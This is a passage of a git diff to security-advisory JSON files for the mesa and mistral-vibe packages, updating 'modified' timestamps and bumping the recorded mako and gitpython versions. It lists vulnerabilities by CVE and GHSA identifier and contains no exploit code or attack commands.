-46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "mako", - "subject_version": "1.3.12", - "key": "pkg:pypi/mako@1.3.12", + "subject_version": "1.4.1", + "key": "pkg:pypi/mako@1.4.1", "resource": "mako" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "mako", - "subject_version": "1.3.12", - "key": "pkg:pypi/mako@1.3.12", + "subject_version": "1.4.1", + "key": "pkg:pypi/mako@1.4.1", "resource": "mako" } ] diff --git a/advisories/BREW-mesa-CVE-2022-40023.json b/advisories/BREW-mesa-CVE-2022-40023.json index 05ecebaf68c..3b9572f2813 100644 --- a/advisories/BREW-mesa-CVE-2022-40023.json +++ b/advisories/BREW-mesa-CVE-2022-40023.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mesa-CVE-2022-40023", "published": "2026-08-13T17:13:21Z", - "modified": "2026-08-13T17:13:21Z", + "modified": "2026-08-22T09:13:32Z", "upstream": [ "GHSA-v973-fxgf-6xhp", "CVE-2022-40023", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.2.2", "resource": "mako", - "resource_purl": "pkg:pypi/mako@1.3.12" + "resource_purl": "pkg:pypi/mako@1.4.1" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "mako", - "subject_version": "1.3.12", - "key": "pkg:pypi/mako@1.3.12", + "subject_version": "1.4.1", + "key": "pkg:pypi/mako@1.4.1", "resource": "mako" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "mako", - "subject_version": "1.3.12", - "key": "pkg:pypi/mako@1.3.12", + "subject_version": "1.4.1", + "key": "pkg:pypi/mako@1.4.1", "resource": "mako" } ] diff --git a/advisories/BREW-mesa-CVE-2026-41205.json b/advisories/BREW-mesa-CVE-2026-41205.json index 0688728578d..964de19a7a9 100644 --- a/advisories/BREW-mesa-CVE-2026-41205.json +++ b/advisories/BREW-mesa-CVE-2026-41205.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mesa-CVE-2026-41205", "published": "2026-08-13T17:13:21Z", - "modified": "2026-08-13T17:13:21Z", + "modified": "2026-08-22T09:13:32Z", "upstream": [ "GHSA-v92g-xgxw-vvmm", "CVE-2026-41205", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.3.11", "resource": "mako", - "resource_purl": "pkg:pypi/mako@1.3.12" + "resource_purl": "pkg:pypi/mako@1.4.1" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "mako", - "subject_version": "1.3.12", - "key": "pkg:pypi/mako@1.3.12", + "subject_version": "1.4.1", + "key": "pkg:pypi/mako@1.4.1", "resource": "mako" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "mako", - "subject_version": "1.3.12", - "key": "pkg:pypi/mako@1.3.12", + "subject_version": "1.4.1", + "key": "pkg:pypi/mako@1.4.1", "resource": "mako" } ] diff --git a/advisories/BREW-mesa-CVE-2026-44307.json b/advisories/BREW-mesa-CVE-2026-44307.json index 5de42d820b8..b8066aeca8f 100644 --- a/advisories/BREW-mesa-CVE-2026-44307.json +++ b/advisories/BREW-mesa-CVE-2026-44307.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mesa-CVE-2026-44307", "published": "2026-08-13T17:13:21Z", - "modified": "2026-08-13T17:13:21Z", + "modified": "2026-08-22T09:13:32Z", "upstream": [ "GHSA-2h4p-vjrc-8xpq", "CVE-2026-44307", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.3.12", "resource": "mako", - "resource_purl": "pkg:pypi/mako@1.3.12" + "resource_purl": "pkg:pypi/mako@1.4.1" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "mako", - "subject_version": "1.3.12", - "key": "pkg:pypi/mako@1.3.12", + "subject_version": "1.4.1", + "key": "pkg:pypi/mako@1.4.1", "resource": "mako" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "mako", - "subject_version": "1.3.12", - "key": "pkg:pypi/mako@1.3.12", + "subject_version": "1.4.1", + "key": "pkg:pypi/mako@1.4.1", "resource": "mako" } ] diff --git a/advisories/BREW-mistral-vibe-CVE-2022-24439.json b/advisories/BREW-mistral-vibe-CVE-2022-24439.json index 90dd79501fd..43438786708 100644 --- a/advisories/BREW-mistral-vibe-CVE-2022-24439.json +++ b/advisories/BREW-mistral-vibe-CVE-2022-24439.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mistral-vibe-CVE-2022-24439", "published": "2026-08-13T17:14:16Z", - "modified": "2026-08-13T17:14:16Z", + "modified": "2026-08-22T09:14:21Z", "upstream": [ "GHSA-hcpj-qp55-gfph", "CVE-2022-24439", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.30", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.57" + "resource_purl": "pkg:pypi/gitpython@3.1.58" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.57", - "key": "pkg:pypi/gitpython@3.1.57", + "subject_version": "3.1.58", + "key": "pkg:pypi/gitpython@3.1.58", "resource": "gitpython" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.57", - "key": "pkg:pypi/gitpython@3.1.57", + "subject_version": "3.1.58", + "key": "pkg:pypi/gitpython@3.1.58", "resource": "gitpython" } ] diff --git a/advisories/BREW-mistral-vibe-CVE-2023-40267.json b/advisories/BREW-mistral-vibe-CVE-2023-40267.json index 0b891e956fd..5998a6615d1 100644 --- a/advisories/BREW-mistral-vibe-CVE-2023-40267.json +++ b/advisories/BREW-mistral-vibe-CVE-2023-40267.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mistral-vibe-CVE-2023-40267", "published": "2026-08-13T17:14:16Z", - "modified": "2026-08-13T17:14:16Z", + "modified": "2026-08-22T09:14:21Z", "upstream": [ "GHSA-pr76-5cm5-w9cj", "CVE-2023-40267", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.32", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.57" + "resource_purl": "pkg:pypi/gitpython@3.1.58" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.57", - "key": "pkg:pypi/gitpython@3.1.57", + "subject_version": "3.1.58", + "key": "pkg:pypi/gitpython@3.1.58", "resource": "gitpython" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.57", - "key": "pkg:pypi/gitpython@3.1.57", + "subject_version": "3.1.58", + "key": "pkg:pypi/gitpython@3.1.58", "resource": "gitpython" } ] diff --git a/advisories/BREW-mistral-vibe-CVE-2023-40590.json b/advisories/BREW-mistral-vibe-CVE-2023-40590.json index db7daf8d8ac..487fe4f3f76 100644 --- a/advisories/BREW-mistral-vibe-CVE-2023-40590.json +++ b/advisories/BREW-mistral-vibe-CVE-2023-40590.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mistral-vibe-CVE-2023-40590", "published": "2026-08-13T17:14:16Z", - "modified": "2026-08-13T17:14:16Z", + "modified": "2026-08-22T09:14:21Z", "upstream": [ "GHSA-wfm5-v35h-vwf4", "CVE-2023-40590", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.33", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.57" + "resource_purl": "pkg:pypi/gitpython@3.1.58" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.57", - "key": "pkg:pypi/gitpython@3.1.57", + "subject_version": "3.1.58", + "key": "pkg:pypi/gitpython@3.1.58", "resource": "gitpython" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.57", - "key": "pkg:pypi/gitpython@3.1.57", + "subject_version": "3.1.58", + "key": "pkg:pypi/gitpython@3.1.58", "resource": "gitpython" } ] diff --git a/advisories/BREW-mistral-vibe-CVE-2023-41040.json b/advisories/BREW-mistral-vibe-CVE-2023-41040.json index ebf104846f7..d936167e2a2 100644 --- a/advisories/BREW-mistral-vibe-CVE-2023-41040.json +++ b/advisories/BREW-mistral-vibe-CVE-2023-41040.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mistral-vibe-CVE-2023-41040", "published": "2026-08-13T17:14:16Z", - "modified": "2026-08-13T17:14:16Z", + "modified": "2026-08-22T09:14:21Z", "upstream": [ "GHSA-cwvm-v4w8-q58c", "CVE-2023-41040", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.37", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.57" + "resource_purl": "pkg:pypi/gitpython@3.1.58" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.57", - "key": "pkg:pypi/gitpython@3.1.57", + "subject_version": "3.1.58", + "key": "pkg:pypi/gitpython@3.1.58", "resource": "gitpython" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.57", - "key": "pkg:pypi/gitpython@3.1.57", + "subject_version": "3.1.58", + "key": "pkg:pypi/gitpython@3.1.58", "resource": "gitpython" } ] diff --git a/advisories/BREW-mistral-vibe-CVE-2024-22190.json b/advisories/BREW-mistral-vibe-CVE-2024-22190.json index 553bdf1af25..63c98ecdc64 100644 --- a/advisories/BREW-mistral-vibe-CVE-2024-22190.json +++ b/advisories/BREW-mistral-vibe-CVE-2024-22190.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mistral-vibe-CVE-2024-22190", "published": "2026-08-13T17:14:16Z", - "modified": "2026-08-13T17:14:16Z", + "modified": "2026-08-22T09:14:21Z", "upstream": [ "GHSA-2mqj-m65w-jghx", "CVE-2024-22190", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.41", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.57" + "resource_purl": "pkg:pypi/gitpython@3.1.58" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.57", - "key": "pkg:pypi/gitpython@3.1.57", + "subject_version": "3.1.58", + "key": "pkg:pypi/gitpython@3.1.58", "resource": "gitpython" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.57", - "key": "pkg:pypi/gitpython@3.1.57", + "subject_version": "3.1.58", + "key": "pkg:pypi/gitpython@3.1.58", "resource": "gitpython" } ] diff --git a/advisories/BREW-mistral-vibe-CVE-2026-42215.json b/advisories/BREW-mistral-vibe-CVE-2026-42215.json index c627c3124c9..f391f0b1630 100644 --- a/advisories/BREW-mistral-vibe-CVE-2026-42215.json +++ b/advisories/BREW-mistral-vibe-CVE-2026-42215.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mistral-vibe-CVE-2026-42215", "published": "2026-08-13T17:14:16Z", - "modified": "2026-08-13T17:14:16Z", + "modified": "2026-08-22T09:14:21Z", "upstream": [ "GHSA-rpm5-65cw-6hj4", "CVE-2026-42215", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.47", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.57" + "resource_purl": "pkg:pypi/gitpython@3.1.58" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.57", - "key": "pkg:pypi/gitpython@3.1.57", + "subject_version": "3.1.58", + "key": "pkg:pypi/gitpython@3.1.58", "resource": "gitpython" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.57", - "key": "pkg:pypi/gitpython@3.1.57", + "subject_version": "3.1.58", + "key": "pkg:pypi/gitpython@3.1.58", "resource": "gitpython" } ] diff --git a/advisories/BREW-mistral-vibe-CVE-2026-42284.json b/advisories/BREW-mistral-vibe-CVE-2026-42284.json index 2c0171cd1b1..cfd2727f299 100644 --- a/advisories/BREW-mistral-vibe-CVE-2026-42284.json +++ b/advisories/BREW-mistral-vibe-CVE-2026-42284.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mistral-vibe-CVE-2026-42284", "published": "2026-08-13T17:14:16Z", - "modified": "2026-08-13T17:14:16Z", + "modified": "2026-08-22T09:14:21Z", "upstream": [ "GHSA-x2qx-6953-8485", "CVE-2026-42284", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.47", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.57" + "resource_purl": "pkg:pypi/gitpython@3.1.58" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.57", - "key": "pkg:pypi/gitpython@3.1.57", + "subject_version": "3.1.58", + "key": "pkg:pypi/gitpython@3.1.58", "resource": "gitpython" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.57", - "key": "pkg:pypi/gitpython@3.1.57", + "subject_version": "3.1.58", + "key": "pkg:pypi/gitpython@3.1.58", "resource": "gitpython" } ] diff --git a/advisories/BREW-mistral-vibe-CVE-2026-44243.json b/advisories/BREW-mistral-vibe-CVE-2026-44243.json index b5abef6071b..2bd9f5c8d14 100644 --- a/advisories/BREW-mistral-vibe-CVE-2026-44243.json +++ b/advisories/BREW-mistral-vibe-CVE-2026-44243.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mistral-vibe-CVE-2026-44243", "published": "2026-08-13T17:14:16Z", - "modified": "2026-08-13T17:14:16Z", + "modified": "2026-08-22T09:14:21Z", "upstream": [ "GHSA-7545-fcxq-7j24", "CVE-2026-44243", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.48", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.57" + "resource_purl": "pkg:pypi/gitpython@3.1.58" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.57", - "key": "pkg:pypi/gitpython@3.1.57", + "subject_version": "3.1.58", + "key": "pkg:pypi/gitpython@3.1.58", "resource": "gitpython" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.57", - "key": "pkg:pypi/gitpython@3.1.57", + "subject_version": "3.1.58", + "key": "pkg:pypi/gitpython@3.1.58", "resource": "gitpython" } ] diff --git a/advisories/BREW-mistral-vibe-CVE-2026-44244.json b/advisories/BREW-mistral-vibe-CVE-2026-44244.json index a11d0cc0923..bf59aff1e52 100644 --- a/advisories/BREW-mistral-vibe-CVE-2026-44244.json +++ b/advisories/BREW-mistral-vibe-CVE-2026-44244.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mistral-vibe-CVE-2026-44244", "published": "2026-08-13T17:14:16Z", - "modified": "2026-08-13T17:14:16Z", + "modified": "2026-08-22T09:14:21Z", "upstream": [ "GHSA-v87r-6q3f-2j67", "CVE-2026-44244", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.49", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.57" + "resource_purl": "pkg:pypi/gitpython@3.1.58" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.57", - "key": "pkg:pypi/gitpython@3.1.57", + "subject_version": "3.1.58", + "key": "pkg:pypi/gitpython@3.1.58", "resource": "gitpython" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.57", - "key": "pkg:pypi/gitpython@3.1.57", + "subject_version": "3.1.58", + "key": "pkg:pypi/gitpython@3.1.58", "resource": "gitpython" } ] diff --git a/advisories/BREW-mistral-vibe-CVE-2026-67322.json b/advisories/BREW-mistral-vibe-CVE-2026-67322.json index c91852fe66b..eb53a56ef25 100644 --- a/advisories/BREW-mistral-vibe-CVE-2026-67322.json +++ b/advisories/BREW-mistral-vibe-CVE-2026-67322.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mistral-vibe-CVE-2026-67322", "published": "2026-08-13T17:14:16Z", - "modified": "2026-08-13T17:14:16Z", + "modified": "2026-08-22T09:14:21Z", "upstream": [ "GHSA-rwj8-pgh3-r573", "CVE-2026-67322" @@ -32,7 +32,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.52", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.57" + "resource_purl": "pkg:pypi/gitpython@3.1.58" } } ], @@ -45,8 +45,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.57", - "key": "pkg:pypi/gitpython@3.1.57", + "subject_version": "3.1.58", + "key": "pkg:pypi/gitpython@3.1.58", "resource": "gitpython" } ] diff --git a/advisories/BREW-mistral-vibe-CVE-2026-67323.json b/advisories/BREW-mistral-vibe-CVE-2026-67323.json index 686bfe323fa..772f2ce89e2 100644 --- a/advisories/BREW-mistral-vibe-CVE-2026-67323.json +++ b/advisories/BREW-mistral-vibe-CVE-2026-67323.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mistral-vibe-CVE-2026-67323", "published": "2026-08-13T17:14:16Z", - "modified": "2026-08-13T17:14:16Z", + "modified": "2026-08-22T09:14:21Z", "upstream": [ "GHSA-956x-8gvw-wg5v", "CVE-2026-67323" @@ -32,7 +32,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.51", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.57" + "resource_purl": "pkg:pypi/gitpython@3.1.58" } } ], @@ -45,8 +45,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.57", - "key": "pkg:pypi/gitpython@3.1.57", + "subject_version": "3.1.58", + "key": "pkg:pypi/gitpython@3.1.58", "resource": "gitpython" } ] diff --git a/advisories/BREW-mistral-vibe-CVE-2026-67324.json b/advisories/BREW-mistral-vibe-CVE-2026-67324.json index d3c0e1d7d77..875a0d3e88b 100644 --- a/advisories/BREW-mistral-vibe-CVE-2026-67324.json +++ b/advisories/BREW-mistral-vibe-CVE-2026-67324.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mistral-vibe-CVE-2026-67324", "published": "2026-08-13T17:14:16Z", - "modified": "2026-08-13T17:14:16Z", + "modified": "2026-08-22T09:14:21Z", "upstream": [ "GHSA-v396-v7q4-x2qj", "CVE-2026-67324" @@ -32,7 +32,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.51", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.57" + "resource_purl": "pkg:pypi/gitpython@3.1.58" } } ], @@ -45,8 +45,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.57", - "key": "pkg:pypi/gitpython@3.1.57", + "subject_version": "3.1.58", + "key": "pkg:pypi/gitpython@3.1.58", "resource": "gitpython" } ] diff --git a/advisories/BREW-mistral-vibe-CVE-2026-67325.json b/advisories/BREW-mistral-vibe-CVE-2026-67325.json index 8fae5b46838..fc0819accf4 100644 --- a/advisories/BREW-mistral-vibe-CVE-2026-67325.json +++ b/advisories/BREW-mistral-vibe-CVE-2026-67325.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mistral-vibe-CVE-2026-67325", "published": "2026-08-13T17:14:16Z", - "modified": "2026-08-13T17:14:16Z", + "modified": "2026-08-22T09:14:21Z", "upstream": [ "GHSA-2f96-g7mh-g2hx", "CVE-2026-67325" @@ -32,7 +32,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.51", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.57" + "resource_purl": "pkg:pypi/gitpython@3.1.58" } } ], @@ -45,8 +45,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.57", - "key": "pkg:pypi/gitpython@3.1.57", + "subject_version": "3.1.58", + "key": "pkg:pypi/gitpython@3.1.58", "resource": "gitpython" } ] diff --git a/advisories/BREW-mistral-vibe-CVE-2026-67326.json b/advisories/BREW-mistral-vibe-CVE-2026-67326.json index 9b909808e58..7574b76e5ce 100644 --- a/advisories/BREW-mistral-vibe-CVE-2026-67326.json +++ b/advisories/BREW-mistral-vibe-CVE-2026-67326.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mistral-vibe-CVE-2026-67326", "published": "2026-08-13T17:14:16Z", - "modified": "2026-08-13T17:14:16Z", + "modified": "2026-08-22T09:14:21Z", "upstream": [ "GHSA-mv93-w799-cj2w", "CVE-2026-67326" @@ -32,7 +32,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.50", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.57" + "resource_purl": "pkg:pypi/gitpython@3.1.58" } } ], @@ -45,8 +45,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.57", - "key": "pkg:pypi/gitpython@3.1.57", + "subject_version": "3.1.58", + "key": "pkg:pypi/gitpython@3.1.58", "resource": "gitpython" } ] diff --git a/advisories/BREW-mistral-vibe-CVE-2026-69097.json b/advisories/BREW-mistral-vibe-CVE-2026-69097.json index 58f5b4f1587..77eb7d3b124 100644 --- a/advisories/BREW-mistral-vibe-CVE-2026-69097.json +++ b/advisories/BREW-mistral-vibe-CVE-2026-69097.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mistral-vibe-CVE-2026-69097", "published": "2026-08-13T17:14:16Z", - "modified": "2026-08-13T17:14:16Z", + "modified": "2026-08-22T09:14:21Z", "upstream": [ "GHSA-3rp5-jjmw-4wv2", "CVE-2026-69097" @@ -32,7 +32,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.53", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.57" + "resource_purl": "pkg:pypi/gitpython@3.1.58" } } ], @@ -45,8 +45,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.57", - "key": "pkg:pypi/gitpython@3.1.57", + "subject_version": "3.1.58", + "key": "pkg:pypi/gitpython@3.1.58", "resource": "gitpython" } ] diff --git a/advisories/BREW-mistral-vibe-CVE-2026-73619.json b/advisories/BREW-mistral-vibe-CVE-2026-73619.json index 1830b2962cb..83fe420712a 100644 --- a/advisories/BREW-mistral-vibe-CVE-2026-73619.json +++ b/advisories/BREW-mistral-vibe-CVE-2026-73619.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mistral-vibe-CVE-2026-73619", "published": "2026-08-14T09:22:15Z", - "modified": "2026-08-14T09:22:15Z", + "modified": "2026-08-22T09:14:21Z", "upstream": [ "GHSA-539m-9xh6-q6rr", "CVE-2026-73619" @@ -32,7 +32,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.57", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.57" + "resource_purl": "pkg:pypi/gitpython@3.1.58" } } ], @@ -45,8 +45,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.57", - "key": "pkg:pypi/gitpython@3.1.57", + "subject_version": "3.1.58", + "key": "pkg:pypi/gitpython@3.1.58", "resource": "gitpython" } ] diff --git a/advisories/BREW-mistral-vibe-CVE-2026-73620.json b/advisories/BREW-mistral-vibe-CVE-2026-73620.json index 366d687eca2..49ef8fe6ce9 100644 --- a/advisories/BREW-mistral-vibe-CVE-2026-73620.json +++ b/advisories/BREW-mistral-vibe-CVE-2026-73620.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mistral-vibe-CVE-2026-73620", "published": "2026-08-14T09:22:15Z", - "modified": "2026-08-14T09:22:15Z", + "modified": "2026-08-22T09:14:21Z", "upstream": [ "GHSA-3f7w-8rr8-f37f", "CVE-2026-73620" @@ -32,7 +32,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.57", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.57" + "resource_purl": "pkg:pypi/gitpython@3.1.58" } } ], @@ -45,8 +45,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.57", - "key": "pkg:pypi/gitpython@3.1.57", + "subject_version": "3.1.58", + "key": "pkg:pypi/gitpython@3.1.58", "resource": "gitpython" } ] diff --git a/advisories/BREW-mistral-vibe-CVE-2026-73621.json b/advisories/BREW-mistral-vibe-CVE-2026-73621.json index 961b21e96d3..f4c16cff509 100644 --- a/advisories/BREW-mistral-vibe-CVE-2026-73621.json +++ b/advisories/BREW-mistral-vibe-CVE-2026-73621.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mistral-vibe-CVE-2026-73621", "published": "2026-08-14T09:22:15Z", - "modified": "2026-08-14T09:22:15Z", + "modified": "2026-08-22T09:14:21Z", "upstream": [ "GHSA-p538-c434-8v24", "CVE-2026-73621" @@ -32,7 +32,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.56", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.57" + "resource_purl": "pkg:pypi/gitpython@3.1.58" } } ], @@ -45,8 +45,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.57", - "key": "pkg:pypi/gitpython@3.1.57", + "subject_version": "3.1.58", + "key": "pkg:pypi/gitpython@3.1.58", "resource": "gitpython" } ] diff --git a/advisories/BREW-mistral-vibe-CVE-2026-73622.json b/advisories/BREW-mistral-vibe-CVE-2026-73622.json index fd860e187f8..46c0eb028e3 100644 --- a/advisories/BREW-mistral-vibe-CVE-2026-73622.json +++ b/advisories/BREW-mistral-vibe-CVE-2026-73622.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mistral-vibe-CVE-2026-73622", "published": "2026-08-14T09:22:15Z", - "modified": "2026-08-14T09:22:15Z", + "modified": "2026-08-22T09:14:21Z", "upstream": [ "GHSA-94p4-4cq8-9g67", "CVE-2026-73622" @@ -32,7 +32,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.55", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.57" + "resource_purl": "pkg:pypi/gitpython@3.1.58" } } ], @@ -45,8 +45,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.57", - "key": "pkg:pypi/gitpython@3.1.57", + "subject_version": "3.1.58", + "key": "pkg:pypi/gitpython@3.1.58", "resource": "gitpython" } ] diff --git a/advisories/BREW-mistral-vibe-CVE-2026-73623.json b/advisories/BREW-mistral-vibe-CVE-2026-73623.json index 16f92dd6202..77c41cfd1fd 100644 --- a/advisories/BREW-mistral-vibe-CVE-2026-73623.json +++ b/advisories/BREW-mistral-vibe-CVE-2026-73623.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mistral-vibe-CVE-2026-73623", "published": "2026-08-14T09:22:15Z", - "modified": "2026-08-14T09:22:15Z", + "modified": "2026-08-22T09:14:21Z", "upstream": [ "GHSA-6p8h-3wgx-97gf", "CVE-2026-73623" @@ -32,7 +32,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.54", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.57" + "resource_purl": "pkg:pypi/gitpython@3.1.58" } } ], @@ -45,8 +45,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.57", - "key": "pkg:pypi/gitpython@3.1.57", + "subject_version": "3.1.58", + "key": "pkg:pypi/gitpython@3.1.58", "resource": "gitpython" } ] diff --git a/advisories/BREW-mistral-vibe-CVE-2026-73624.json b/advisories/BREW-mistral-vibe-CVE-2026-73624.json index 6a752a2512b..5189f2eae32 100644 --- a/advisories/BREW-mistral-vibe-CVE-2026-73624.json +++ b/advisories/BREW-mistral-vibe-CVE-2026-73624.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mistral-vibe-CVE-2026-73624", "published": "2026-08-14T09:22:15Z", - "modified": "2026-08-14T09:22:15Z", + "modified": "2026-08-22T09:14:21Z", "upstream": [ "GHSA-fjr4-x663-mwxc", "CVE-2026-73624" @@ -32,7 +32,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.54", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.57" + "resource_purl": "pkg:pypi/gitpython@3.1.58" } } ], @@ -45,8 +45,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.57", - "key": "pkg:pypi/gitpython@3.1.57", + "subject_version": "3.1.58", + "key": "pkg:pypi/gitpython@3.1.58", "resource": "gitpython" } ] diff --git a/advisories/BREW-mistral-vibe-CVE-2026-73625.json b/advisories/BREW-mistral-vibe-CVE-2026-73625.json index 574539c3a19..8dfd8dc796c 100644 --- a/advisories/BREW-mistral-vibe-CVE-2026-73625.json +++ b/advisories/BREW-mistral-vibe-CVE-2026-73625.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mistral-vibe-CVE-2026-73625", "published": "2026-08-14T09:22:15Z", - "modified": "2026-08-14T09:22:15Z", + "modified": 